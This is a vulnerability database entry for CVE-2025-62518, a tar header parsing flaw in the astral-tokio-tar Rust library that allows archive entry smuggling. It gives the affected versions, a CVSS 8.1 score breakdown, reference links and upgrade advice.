Boundary Parsing Vulnerability in Astral-Tokio-Tar Library by Astral
CVE-2025-62518

8.1HIGH

Key Information:

Vendor

Astral-sh

Status
Tokio-tar
Vendor
CVE Published:
21 October 2025

What is CVE-2025-62518?

The astral-tokio-tar library, used for reading and writing tar archives in async Rust applications, contains a vulnerability that affects versions prior to 0.5.6. This flaw allows attackers to exploit inconsistent handling of PAX/ustar headers, which can lead to the smuggling of additional archive entries. Specifically, when processing tar archives with extended PAX headers that specify size overrides, the library parser incorrectly interprets stream position based on ustar header size, potentially resulting in the misinterpretation of file contents as valid tar headers. To mitigate this risk, users are advised to upgrade to version 0.5.6 or later, as there are no workarounds available.

Affected Version(s)

tokio-tar < 0.5.6

References

https://github.com/astral-sh/tokio-tar/security/advisorie...
x_refsource_CONFIRM
https://github.com/astral-sh/uv/security/advisories/GHSA-...
x_refsource_MISC
https://github.com/astral-sh/tokio-tar/commit/22b3f884adb...
x_refsource_MISC

CVSS V3.1

Score:
8.1
Severity:
HIGH
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
None
User Interaction:
Required
Scope:
Unchanged

Timeline

  • Vulnerability published

  • Vulnerability Reserved

JSON
.
CVE-2025-62518 : Boundary Parsing Vulnerability in Astral-Tokio-Tar Library by Astral